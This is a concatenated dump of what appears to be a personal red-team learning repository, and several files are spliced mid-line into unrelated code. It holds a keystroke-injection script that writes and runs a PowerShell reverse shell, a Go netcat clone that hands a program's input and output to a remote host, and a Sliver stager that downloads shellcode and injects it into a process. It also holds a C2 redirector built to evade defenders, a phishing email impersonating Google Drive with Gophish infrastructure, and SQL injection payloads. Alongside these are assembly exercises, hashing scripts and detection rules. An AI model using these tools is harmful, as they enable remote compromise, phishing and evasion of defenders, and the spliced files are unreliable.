h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 7 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 8 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 9 | github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs= 10 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 11 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 12 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 13 | -------------------------------------------------------------------------------- /PhysicalPentestStuff/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Alexis Rodriguez 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/convert_to_big_little_endian.py: -------------------------------------------------------------------------------- 1 | from sys import argv, exit 2 | 3 | def to_little_endian(mem_addr:str): 4 | mem_addr=mem_addr.replace("0x", "") 5 | l=[] 6 | if len(mem_addr) % 2 != 0: 7 | print(f"Memory address length must be even") 8 | exit(1) 9 | for i in range(len(mem_addr)-1, -1, -2): 10 | l.append(mem_addr[i-1]+mem_addr[i]) 11 | return "\\x"+"\\x".join(l) 12 | 13 | def to_big_endian(mem_addr:str): 14 | mem_addr=mem_addr.replace("0x", "") 15 | l=[] 16 | if len(mem_addr) % 2 != 0: 17 | print(f"Memory address length must be even") 18 | exit(1) 19 | for i in range(0, len(mem_addr), 2): 20 | l.append(mem_addr[i]+mem_addr[i+1]) 21 | return "\\x"+"\\x".join(l) 22 | 23 | if __name__ == "__main__": 24 | if len(argv) < 2: 25 | print(f"Usage: {__file__} > r.ps1"); 25 | delay(100); 26 | press("ENTER"); 27 | 28 | // execute powershell script 29 | type("./r.ps1"); 30 | delay(100); 31 | press("ENTER"); 32 | 33 | // close powershell 34 | press("ALT 4"); 35 | } 36 | 37 | reverse_shell(); 38 | 39 | // run with: 40 | // P4wnP1_cli hid run powershell_reverse_shell.js 41 | -------------------------------------------------------------------------------- /Misc/emailer.py: -------------------------------------------------------------------------------- 1 | import smtplib, ssl 2 | 3 | class Emailer(): 4 | def __init__(self, smtp_server, smtp_port): 5 | self.smtp_server = smtp_server 6 | self.smtp_port = smtp_port 7 | 8 | def __enter__(self): 9 | context = ssl.create_default_context() 10 | self.server = smtplib.SMTP_SSL(self.smtp_server, 11 | self.smtp_port, 12 | context=context) 13 | return self 14 | 15 | def __exit__(self, exc_type, exc_val, exc_tb): 16 | self.server.quit() 17 | return False 18 | 19 | def authenticate(self, sender_email, password): 20 | self.sender_email = sender_email 21 | try: 22 | self.server.login(self.sender_email, password) 23 | except: 24 | return False 25 | return True 26 | 27 | def send(self, recipient_email, subject, msg): 28 | # Using RFC822 email string 29 | msg = f"Subject:{subject}\n\n{msg}" 30 | try: 31 | self.server.sendmail(self.sender_email, recipient_email, msg) 32 | except: 33 | return False 34 | return True 35 | 36 | -------------------------------------------------------------------------------- /CTFs/TenableCTF/RabbitHole/sol.py: -------------------------------------------------------------------------------- 1 | from requests import get 2 | from time import sleep 3 | from re import search 4 | 5 | proxies = { 6 | "http": "http://127.0.0.1:8080", 7 | "https":"https://127.0.0.1:443" 8 | } 9 | 10 | letters_and_nums = "" 11 | 12 | def send_req(base_url, page=None): 13 | global letters_and_nums 14 | 15 | if page: 16 | params = {"page": page} 17 | else: 18 | params = {} 19 | 20 | #resp = get(base_url, params=params, proxies=proxies).text 21 | resp = get(base_url, params=params).text 22 | print(resp) 23 | if "flag" not in resp: 24 | page = search(r"([A-Za-z0-9]{5,})", resp).group(1) 25 | h = search(r"\'([A-Fa-f0-9]{2})\'", resp).group(1) 26 | letters_and_nums += (":" + h) 27 | print(letters_and_nums) 28 | #b = bytes.fromhex(h) 29 | #try: 30 | # print(b.decode("ASCII")) 31 | #except: 32 | # pass 33 | return page 34 | 35 | 36 | def main(): 37 | url = "http://167.71.246.232:8080/rabbit_hole.php" 38 | page = send_req(url) 39 | while True: 40 | page = send_req(url, page) 41 | sleep(0.5) 42 | 43 | main() 44 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPClients/requests.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "io/ioutil" 6 | "net/http" 7 | "net/url" 8 | "strings" 9 | ) 10 | 11 | func main() { 12 | // Get requests 13 | resp, err := http.Get("https://www.google.com/robots.txt") 14 | defer resp.Body.Close() 15 | if err != nil { 16 | panic(err) 17 | } 18 | fmt.Println(resp.Status) 19 | 20 | // POST requests 21 | form := url.Values{} 22 | form.Add("Name", "Binexis") 23 | resp, err = http.Post( 24 | "https://www.google.com/robots.txt", 25 | "application/x-www-form-urlencoded", 26 | strings.NewReader(form.Encode()), 27 | ) 28 | if err != nil { 29 | panic(err) 30 | } 31 | 32 | fmt.Println(resp.Status) 33 | 34 | // Get requests using ```http.NewRequest``` and ```http.Client``` 35 | // for more customization 36 | req, err := http.NewRequest("GET", "https://www.google.com/robots.txt", nil) 37 | client := http.Client{} 38 | resp, err = client.Do(req) 39 | if err != nil { 40 | panic(err) 41 | } 42 | fmt.Println(resp.Status) 43 | 44 | // Reading response body 45 | body, err := ioutil.ReadAll(resp.Body) 46 | if err != nil { 47 | panic(err) 48 | } 49 | 50 | fmt.Println(string(body)) 51 | } 52 | -------------------------------------------------------------------------------- /OffensiveGo/NetcatClone/client.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net" 6 | "os" 7 | "os/exec" 8 | "strconv" 9 | ) 10 | 11 | type Command struct { 12 | Program string 13 | Args []string 14 | Cmd *exec.Cmd 15 | } 16 | 17 | func (c *Command) exec(conn net.Conn) { 18 | c.Cmd = exec.Command(c.Program, c.Args...) 19 | c.Cmd.Stdin = conn 20 | c.Cmd.Stdout = conn 21 | c.Cmd.Stderr = conn 22 | c.Cmd.Run() 23 | } 24 | 25 | func connect(ip string, port int) net.Conn { 26 | connectStr := fmt.Sprintf("%s:%d", ip, port) 27 | conn, err := net.Dial("tcp", connectStr) 28 | if err != nil { 29 | fmt.Printf("couldn't connect to %s...\n", connectStr) 30 | } 31 | return conn 32 | } 33 | 34 | func main() { 35 | thisProgram := os.Args[0] 36 | if len(os.Args[:]) < 4 { 37 | fmt.Println(fmt.Sprintf("usage: %s $EXTERNAL_NET $HTTP_PORTS (msg:"Probable phishing attack"; flow:established,to_server; content:"GET"; http_method; content:"/ldkfJu.php?"; http_uri; classtype:trojan-activity; sid:10000001; rev:1;) 2 | 3 | alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "Probable post-infection - Indicator"; flow:established,to_server; content:"GET"; http_method; content:"/bibi/"; http_uri; pcre:"/(\.txt|\.exe|\.tiff|\.dll|\.zip)"; classtype:trojan-activity; sid:10000002; rev:1;) 4 | 5 | alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS ( msg:"Boleto - Second Indicator", flow:established,to_server; content:"GET"; http_method; content:"/bsb/infects/index.php?"; http_uri; classtype:trojan-activity; sid:10000003; rev:1; ) 6 | 7 | alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Boleto - Third Indicator"; flow:established,to_server; content:"GET"; http_method; content:"/bdb/debugnosso/index.php?"; http_uri; sid:10000004; rev:1;) 8 | 9 | alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Boleto - Fourth Indicator"; flow:established,to_server; content:"POST"; http_method; content:"/metre/admin/x.php"; http_uri; classtype:trojan-activity; sid:10000005; rev:1;) -------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab3/README.md: -------------------------------------------------------------------------------- 1 | # Union Attacks > Determining the Number of Columns 2 | 3 | ### Objectives 4 | 5 | - Determine the number of columns returned by the server using either `ORDER BY [NUM]` or `UNION SELECT [NULL,...]-- -` methods 6 | - Once the number of columns is known, return an additional row containing a NULL values 7 | 8 | ### Solution 9 | 10 | The `category` query parameter is vulnerable to a SQL Injection UNION attack. To determine the number of columns being returned in the response, use the following 11 | SQL payload: 12 | 13 | ``` 14 | https://.web-security-academy.net/filter?category=Accessories' ORDER BY 1-- - 15 | ``` 16 | 17 | Increment the count by 1 until you get an internal server error - specifying `ORDER BY 4-- -`, returns the error. So we now know the number of columns being 18 | return is **3**. 19 | 20 | To solve the challenge, use the following request to solve the challenge (notice we are using 3 NULLs because we determine each row returned in the response 21 | consists of 3 columns): 22 | 23 | ``` 24 | https://.web-security-academy.net/filter?category=Accessories' UNION SELECT NULL,NULL,NULL-- - 25 | ``` 26 | -------------------------------------------------------------------------------- /SLAE/MovingData/movingdata.nasm: -------------------------------------------------------------------------------- 1 | ; Author : Alexis Rodriguez 2 | ; Date : 06/28/2020 3 | ; File : movingdata.nasm 4 | ; IS ; x86 Assembly 5 | 6 | global _start 7 | 8 | section .text 9 | _start: 10 | ; move data directly into registers 11 | mov eax, 0xaaaaaa 12 | mov al, 0xbb 13 | mov ah, 0xcc 14 | mov ax, 0xdddd 15 | 16 | ; moving data from register to register 17 | mov ebx, eax 18 | mov cl, al 19 | mov ch, ah 20 | mov cx, ax 21 | 22 | mov ebx, 0 23 | mov ecx, 0 24 | 25 | ; moving data from memory into registers 26 | mov al, [sample] 27 | mov ah, [sample+1] 28 | mov bx, [sample] 29 | mov ecx, [sample] 30 | 31 | ; moving data from registers into memory 32 | mov eax, 0x33445566 33 | mov byte [sample], al 34 | mov word [sample], ax 35 | mov dword [sample], eax 36 | 37 | ; move data into memory 38 | mov dword [sample], 0x33445566 39 | 40 | ; lea, load effective address usage 41 | lea eax, [sample] 42 | lea ebx, [eax] 43 | 44 | ; xchg, exchange usage 45 | mov eax, 0x11223344 46 | mov ebx, 0xaabbccdd 47 | xchg eax, ebx 48 | 49 | ; exiting program with exit code 2 50 | mov eax, 0x1 51 | mov ebx, 0x0 52 | int 0x80 53 | 54 | section .data 55 | sample: db 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff, 0x11, 0x22 56 | -------------------------------------------------------------------------------- /Cryptography/Hashing/file_hashing.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | pip3 install prettytable 4 | """ 5 | import hashlib 6 | from prettytable import PrettyTable 7 | from sys import argv, exit 8 | 9 | def generate_hashes_for_file(file_): 10 | # MD5, SHA1, SHA224, SHA256, SHA384, and SHA512 11 | text = open(file_, "rb").read() 12 | md5_hash = hashlib.md5(text).hexdigest() 13 | sha1_hash = hashlib.sha1(text).hexdigest() 14 | sha224_hash = hashlib.sha224(text).hexdigest() 15 | sha256_hash = hashlib.sha256(text).hexdigest() 16 | sha512_hash = hashlib.sha512(text).hexdigest() 17 | return ( 18 | md5_hash, sha1_hash, sha224_hash, sha256_hash, sha512_hash 19 | ) 20 | if __name__ == "__main__": 21 | if len(argv) < 2: 22 | print(f"Usage: {__file__} ") 23 | exit(1) 24 | file_ = argv[1] 25 | file_hashes = generate_hashes_for_file(file_) 26 | 27 | hash_algorithms = "MD5", "SHA1", "SHA224", "SHA256", "SHA512" 28 | print(f"Generating hashes for file: {file_}") 29 | t = PrettyTable(["Hash Function", "Digest"], padding_width=0) 30 | for algorithm, digest in zip(hash_algorithms, file_hashes): 31 | t.add_row([algorithm, digest]) 32 | print(t) 33 | -------------------------------------------------------------------------------- /Cryptography/Hashing/key_derivation_with_scrypt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from cryptography.hazmat.primitives.kdf.scrypt import Scrypt 4 | from cryptography.hazmat.backends import default_backend 5 | from os import urandom 6 | from sys import argv, exit 7 | 8 | def generating_scrypt_key(key): 9 | salt = urandom(16) 10 | """ 11 | length: how long the key will be after the process is finished 12 | n : CPU/memory cost parameter 13 | r: block size parameter 14 | p: threads to run in parallel 15 | 16 | n should be a number divisible by 2. For operations that 17 | require less wait time (such as a login request), 2**14 is 18 | suggested. For operations that are more sensitive, 2**20 is suggested. 19 | """ 20 | key_derivation_func = Scrypt(salt=salt, length=32, 21 | n=2**14, r=8, p=1, 22 | backend=default_backend()) 23 | key = key_derivation_func.derive(b"deriveFromPasswor") 24 | return key 25 | 26 | if __name__ == "__main__": 27 | if len(argv) < 2: 28 | print(f"Usage: {__file__} ") 29 | exit(1) 30 | password = argv[1] 31 | key = generating_scrypt_key(password).hex() 32 | print(key) 33 | -------------------------------------------------------------------------------- /SLAE/Arithmetic/add_sub.nasm: -------------------------------------------------------------------------------- 1 | ; Author : Alexis Rodriguez 2 | ; Date : 06/29/2020 3 | ; File : add_sub.nasm 4 | ; IS : x86 Assembly 5 | 6 | global _start 7 | 8 | section .text 9 | _start: 10 | ; register based addition 11 | mov eax, 0x0 12 | add al, 0x22 13 | add al, 0x11 14 | 15 | mov ax, 0x1122 16 | add ax, 0x3344 17 | 18 | mov eax, 0xffffffff 19 | add eax, 0x10 20 | 21 | ; memory based addition 22 | mov eax, 0x0 23 | add byte [var1], 0x22 24 | add byte [var1], 0x11 25 | 26 | add word [var2], 0x1122 27 | add word [var2], 0x3344 28 | 29 | mov dword [var3], 0xffffffff 30 | add dword [var3], 0x10 31 | 32 | ; set / clear / complement carry flag 33 | clc 34 | stc 35 | cmc 36 | 37 | ; add with carry 38 | mov eax, 0x0 39 | stc 40 | adc al, 0x22 41 | stc 42 | adc al, 0x11 43 | 44 | mov ax, 0x1122 45 | stc 46 | adc ax, 0x3344 47 | 48 | mov eax, 0xffffffff 49 | stc 50 | adc eax, 0x10 51 | 52 | ; subtract 53 | mov eax, 0xa 54 | sub eax, 0x5 55 | stc 56 | sbb eax, 0x4 57 | 58 | ; increment and decrement 59 | inc eax 60 | dec eax 61 | 62 | ; exit program 63 | mov eax, 0x1 64 | mov ebx, 0x0 65 | int 0x80 66 | 67 | section .data 68 | var1: db 0x00 69 | var2: dw 0x0000 70 | var3: dd 0x00000000 71 | -------------------------------------------------------------------------------- /Phishing/Gophish/ec2.tf: -------------------------------------------------------------------------------- 1 | resource "aws_instance" "gophish_instance" { 2 | subnet_id = "${aws_subnet.public_subnet.id}" 3 | ami = "${var.ami}" 4 | instance_type = "${var.instance_type}" 5 | key_name = "${aws_key_pair.gophish_ssh_key.key_name}" 6 | 7 | tags = { 8 | Name = "gophish-instance" 9 | } 10 | 11 | vpc_security_group_ids = [ "${aws_security_group.gophish_sg.id}" ] 12 | 13 | # Base64 encoded string of the `user-data.sh` Bash script in the current directory 14 | user_data_base64 = "IyEvYmluL2Jhc2gKCmdvcGhpc2hfc2V0dXAoKSB7CiAgbWtkaXIgL29wdC9nb3BoaXNoCiAgY2QgL29wdC9nb3BoaXNoCiAgd2dldCAtTyBnb3BoaXNoLnppcCAnaHR0cHM6Ly9naXRodWIuY29tL2dvcGhpc2gvZ29waGlzaC9yZWxlYXNlcy9kb3dubG9hZC92MC4xMS4wL2dvcGhpc2gtdjAuMTEuMC1saW51eC02NGJpdC56aXAnCiAgdW56aXAgZ29waGlzaC56aXAKICBybSBnb3BoaXNoLnppcAogIHNlZCAtaSAnc3wxMjdcLjBcLjBcLjF8MFwuMFwuMFwuMHxnJyBjb25maWcuanNvbgogIGNobW9kICt4IC4vZ29waGlzaAogIC4vZ29waGlzaCAmCn0KCm1haWxob2dfc2V0dXAoKSB7CiAgIyBVc2UgbWFpbGhvZyBhcyB0aGUgc2VuZGluZyBTTVRQIHNlcnZlcgogIG1rZGlyIC9vcHQvbWFpbGhvZwogIGNkIC9vcHQvbWFpbGhvZwogIHdnZXQgLU8gbWFpbGhvZyAnaHR0cHM6Ly9naXRodWIuY29tL21haWxob2cvTWFpbEhvZy9yZWxlYXNlcy9kb3dubG9hZC92MS4wLjEvTWFpbEhvZ19saW51eF9hbWQ2NCcKICBjaG1vZCAreCAuL21haWxob2cKICAuL21haWxob2cgJgp9Cgpnb3BoaXNoX3NldHVwCm1haWxob2dfc2V0dXAK" 15 | } 16 | -------------------------------------------------------------------------------- /C2Routing/caddy/example_redirector/Caddyfile: -------------------------------------------------------------------------------- 1 | # Example Caddyfile checking for common blue team forensics user agents 2 | # and redirecting to amazon 3 | 4 | # global options 5 | { 6 | http_port 8000 7 | https_port 8443 8 | # turn off admin endpoint 9 | admin off 10 | } 11 | 12 | # server listening on port 8000 13 | :8000 { 14 | # log requests to stdout 15 | log { 16 | output stdout 17 | #output file ./access.log 18 | # use human-readable formating as opposed to JSON 19 | } 20 | 21 | # named matcher matching user agents with regex 22 | @user-agent-blacklist { 23 | # case insensitive match of user agents using re2 regular expressions 24 | # NOTE: header_regexp only allows 1 regular expression per header 25 | header_regexp User-Agent "(?i)curl*|wget*|nmap*" 26 | } 27 | 28 | # redirect to amazon if request user agent matches condition in user-agent-blacklist 29 | redir @user-agent-blacklist https://aws.amazon.com 301 30 | 31 | # {remote} placeholder containing the IP:Port of connecting machine 32 | reverse_proxy 127.0.0.1:31337 { 33 | header_up Host {upstream_hostport} 34 | header_up X-Forwarded-Host {host} 35 | header_up X-Forwarded-Port {port} 36 | } 37 | } 38 | 39 | # setting up an example C2 server 40 | :31337 { 41 | respond "Hello, {remote}, from your C2" 42 | } 43 | -------------------------------------------------------------------------------- /LearningResources/README.md: -------------------------------------------------------------------------------- 1 | # Cybersecurity Learning Resources 2 | 3 | ### Presentations 4 | - [Break The Isolation: Cross-Account AWS Vulnerabilities](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Breaking-The-Isolation-Cross-Account-AWS-Vulnerabilities.pdf) 5 | - [HTTP/2: The Sequel is Always Worse](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Kettle-HTTP-The-Sequel-Is-Always-Worse.pdf) 6 | 7 | ### Blogs 8 | - [GadgetToJScript, Covenant, Donut](https://3xpl01tc0d3r.blogspot.com/2020/02/gadgettojscript-covenant-donut.html) 9 | - [Attacking Active Directory](https://zer1t0.gitlab.io/posts/attacking_ad/) 10 | - [F-Secure: Hunting for AMSI Bypasses](https://blog.f-secure.com/hunting-for-amsi-bypasses/) 11 | 12 | ### Tools/Repos 13 | - [Caddy Server](https://caddyserver.com/docs/) 14 | - [Sliver C2](https://github.com/BishopFox/sliver) 15 | - [Covenant C2](https://github.com/cobbr/Covenant) 16 | - [Merlin C2 Server](https://github.com/Ne0nd0g/merlin) / [Merlin C2 Agent](https://github.com/Ne0nd0g/merlin-agent) 17 | - [Pwn Jenkins](https://github.com/gquere/pwn_jenkins) 18 | - [Cobalt Strike: Malleable C2 Profiles](https://github.com/xx0hcd/Malleable-C2-Profiles) 19 | - [Active Directory Exploitation Cheat Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet) 20 | -------------------------------------------------------------------------------- /Misc/YARA/ExtractFileIPs.yar: -------------------------------------------------------------------------------- 1 | rule ExtractFileIPs 2 | { 3 | meta: 4 | description = "This Yara rule extracts IP addresses located within a file" 5 | author = "Alexis Rodriguez" 6 | date = "2020-10-12" 7 | 8 | strings: 9 | // the wide modifier means to search for strings that 10 | // are encoded with two bytes per character (utf-16, etc) 11 | // the ascii is the default modifier for strings 12 | // so the ascii modifier is implicitly used when the wide 13 | // modifier is not used 14 | $ip = /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/ wide ascii 15 | 16 | condition: 17 | $ip and filesize < 10MB 18 | } 19 | -------------------------------------------------------------------------------- /OffensiveGo/ProcessInjection/SliverStager/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "io/ioutil" 6 | "net" 7 | "time" 8 | 9 | arg "github.com/alexflint/go-arg" 10 | ) 11 | 12 | var args struct { 13 | ListInjectableProcesses bool `arg:"-l,--list-injectable-processes" help:"list injectable processes"` 14 | ProcessPID int `arg:"-p,--pid" help:"the process ID to inject payload into" default:"0"` 15 | SliverHost string `arg:"-s,--sliver-host" help:"the sliver IP:PORT hosting the stager to execute"` 16 | } 17 | 18 | func main() { 19 | arg.MustParse(&args) 20 | 21 | if args.ListInjectableProcesses { 22 | findInjectableProcesses() 23 | return 24 | } 25 | 26 | if args.ProcessPID != 0 { 27 | if args.SliverHost == "" { 28 | fmt.Println("must specify sliver IP:PORT hosting stager, `--sliver-host`") 29 | return 30 | } else { 31 | dialer := net.Dialer{ 32 | Timeout: time.Second * 3, 33 | } 34 | conn, err := dialer.Dial("tcp", args.SliverHost) 35 | if err != nil { 36 | fmt.Println(err.Error()) 37 | return 38 | } 39 | defer conn.Close() 40 | payload, _ := ioutil.ReadAll(conn) 41 | ntCreateRemoteThread(args.ProcessPID, payload) 42 | } 43 | } else { 44 | fmt.Println("must specify a valid PID with `--pid`") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/Wordlists/usernames.txt: -------------------------------------------------------------------------------- 1 | root 2 | admin 3 | test 4 | guest 5 | info 6 | adm 7 | mysql 8 | user 9 | administrator 10 | oracle 11 | ftp 12 | pi 13 | puppet 14 | ansible 15 | ec2-user 16 | vagrant 17 | azureuser 18 | academico 19 | acceso 20 | access 21 | accounting 22 | accounts 23 | acid 24 | activestat 25 | ad 26 | adam 27 | adkit 28 | admin 29 | administracion 30 | administrador 31 | administrator 32 | administrators 33 | admins 34 | ads 35 | adserver 36 | adsl 37 | ae 38 | af 39 | affiliate 40 | affiliates 41 | afiliados 42 | ag 43 | agenda 44 | agent 45 | ai 46 | aix 47 | ajax 48 | ak 49 | akamai 50 | al 51 | alabama 52 | alaska 53 | albuquerque 54 | alerts 55 | alpha 56 | alterwind 57 | am 58 | amarillo 59 | americas 60 | an 61 | anaheim 62 | analyzer 63 | announce 64 | announcements 65 | antivirus 66 | ao 67 | ap 68 | apache 69 | apollo 70 | app 71 | app01 72 | app1 73 | apple 74 | application 75 | applications 76 | apps 77 | appserver 78 | aq 79 | ar 80 | archie 81 | arcsight 82 | argentina 83 | arizona 84 | arkansas 85 | arlington 86 | as 87 | as400 88 | asia 89 | asterix 90 | at 91 | athena 92 | atlanta 93 | atlas 94 | att 95 | au 96 | auction 97 | austin 98 | auth 99 | auto 100 | autodiscover 101 | -------------------------------------------------------------------------------- /NSE/http-server-header-enum.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- @usage 3 | -- 4 | -- @output 5 | -- 6 | -- @args 7 | -- 8 | --- 9 | 10 | local shortPort = require "shortport" 11 | local ipOps = require "ipOps" 12 | local http = require "http" 13 | local stdNse = require "stdnse" 14 | local b64 = require "base64" 15 | 16 | description = [[ 17 | An example NSE script that simply makes an HTTP request to 18 | any HTTP(S) ports it finds while echoing the request status line 19 | to stdout 20 | ]] 21 | 22 | author = {"Alexis Rodriguez"} 23 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 24 | categories = { 25 | "safe" 26 | } 27 | 28 | function hostrule(host) 29 | -- checks if IP address is local, if not, 30 | -- script won't run 31 | return ipOps.isPrivate(host) 32 | end 33 | 34 | function portrule() 35 | -- returns a function that matches on ports, services, protocol, and state 36 | return shortPort.port_or_service({80, 443}, {"http", "https"}, "tcp", "open") 37 | end 38 | 39 | function action(host, port) 40 | -- debug logs 41 | stdNse.debug(1, "IP::%s", host.ip) 42 | stdNse.debug(1, "PORT::%s", port.number) 43 | 44 | opts = {} 45 | local resp = http.get(host, port, "/", opts) 46 | 47 | return stdNse.format_output( 48 | true, string.format("Server Header ==> %s", resp.header["server"]) 49 | ) 50 | end 51 | -------------------------------------------------------------------------------- /Phishing/Gophish/email_templates/google-drive.tmpl.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 |

Hello {{.FirstName}},

7 | 8 |

Please refer to the vital info I've shared with you using Google Drive. 

9 | 10 |

Click https://google.com/drive/docs/file012345 and sign in to view details..

11 | 12 |

 

13 | 14 |

Regards.

15 | 16 |

 

17 | 18 |

CONFIDENTIALITY NOTICE:  This e-mail and any transmitted files are private and confidential and are solely for the use of the recipient(s) to whom it is addressed.  Any unauthorized review, use, disclosure, distribution or copying of this communication is strictly forbidden.  If you have received this communication in error, please delete and immediately notify the sender via the e-mail return address.  Thank you for your compliance.

19 | 20 |

Please consider the environment before printing this e-mail.

21 | 22 |

 

23 | 24 |

{{.Tracker}}

25 | 26 | 27 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/auth_with_negroni.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "net/http" 7 | 8 | "github.com/gorilla/mux" 9 | "github.com/urfave/negroni" 10 | ) 11 | 12 | type BadAuth struct { 13 | Username string 14 | Password string 15 | } 16 | 17 | func (b *BadAuth) ServeHTTP(w http.ResponseWriter, r *http.Request, next http.HandlerFunc) { 18 | username := r.URL.Query().Get("username") 19 | password := r.URL.Query().Get("password") 20 | if username == "" || password == "" { 21 | http.Error(w, "Not Authorized", 401) 22 | return 23 | } 24 | 25 | // Adding the ``username`` value to context of r 26 | ctx := context.WithValue(r.Context(), "username", username) 27 | // Setting the new context to the one created in the line above 28 | r = r.WithContext(ctx) 29 | // Invoking the next middleware in the chain 30 | next(w, r) 31 | } 32 | 33 | func login(w http.ResponseWriter, r *http.Request) { 34 | username := r.Context().Value("username").(string) 35 | fmt.Fprintf(w, "Welcome, %s\n!", username) 36 | } 37 | 38 | func main() { 39 | r := mux.NewRouter() 40 | r.HandleFunc("/login", login).Methods("GET") 41 | n := negroni.Classic() 42 | n.Use(&BadAuth{ 43 | Username: "admin", 44 | Password: "totally secure password123", 45 | }) 46 | n.UseHandler(r) 47 | http.ListenAndServe("127.0.0.1:8080", n) 48 | } 49 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/Wordlists/passwords.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | password 3 | 12345678 4 | qwerty 5 | 123456789 6 | 12345 7 | 1234 8 | 111111 9 | 1234567 10 | dragon 11 | 123123 12 | baseball 13 | abc123 14 | football 15 | monkey 16 | letmein 17 | shadow 18 | master 19 | 666666 20 | qwertyuiop 21 | 123321 22 | mustang 23 | 1234567890 24 | michael 25 | 654321 26 | superman 27 | 1qaz2wsx 28 | 7777777 29 | 121212 30 | 000000 31 | qazwsx 32 | 123qwe 33 | killer 34 | trustno1 35 | jordan 36 | jennifer 37 | zxcvbnm 38 | asdfgh 39 | hunter 40 | buster 41 | soccer 42 | harley 43 | batman 44 | andrew 45 | tigger 46 | sunshine 47 | iloveyou 48 | 2000 49 | charlie 50 | robert 51 | thomas 52 | hockey 53 | ranger 54 | daniel 55 | starwars 56 | klaster 57 | 112233 58 | george 59 | computer 60 | michelle 61 | jessica 62 | pepper 63 | 1111 64 | zxcvbn 65 | 555555 66 | 11111111 67 | 131313 68 | freedom 69 | 777777 70 | pass 71 | maggie 72 | 159753 73 | aaaaaa 74 | ginger 75 | princess 76 | joshua 77 | cheese 78 | amanda 79 | summer 80 | love 81 | ashley 82 | nicole 83 | chelsea 84 | biteme 85 | matthew 86 | access 87 | yankees 88 | 987654321 89 | dallas 90 | austin 91 | thunder 92 | taylor 93 | matrix 94 | mobilemail 95 | mom 96 | monitor 97 | monitoring 98 | montana 99 | moon 100 | moscow 101 | -------------------------------------------------------------------------------- /Phishing/Gophish/README.md: -------------------------------------------------------------------------------- 1 | # Gophish Phishing Infrastructure Automation (AWS) 2 | 3 | ### Prequisites 4 | 1. AWS credential profile (`~/.aws/credentials`) 5 | 2. A Domain - We'll be using Amazon Route 53 to register a domain if you don't already have one. 6 | 3. An SMTP server - We'll be using AWS SES (Simple Email Server). 7 | 4. Download and install [Terraform](https://www.terraform.io/downloads.html) 8 | 9 | ### Run 10 | 11 | > Don't forget to change the AWS profile name in the `main.tf` file to your profile name 12 | 13 | ```bash 14 | terraform init 15 | terraform validate 16 | terraform plan 17 | terraform apply --auto-approve 18 | ``` 19 | 20 | ### Obtaining the Admin Creds for Gophish Login 21 | ```bash 22 | ssh -i id_rsa ec2-user@[EC2_INSTANCE_IP] 23 | sudo cat /var/log/cloud-init-output.log | grep -oE '(Please.*)password\s[a-f0-9]+' | awk '{print $(NF-1),"=",$NF}' 24 | ``` 25 | 26 | > Login to Gophish interface at https://[EC2_INSTANCE_IP]:3333 27 | 28 | > Enter the credentials admin:[PASSWORD] 29 | 30 | ### Creating Target Groups 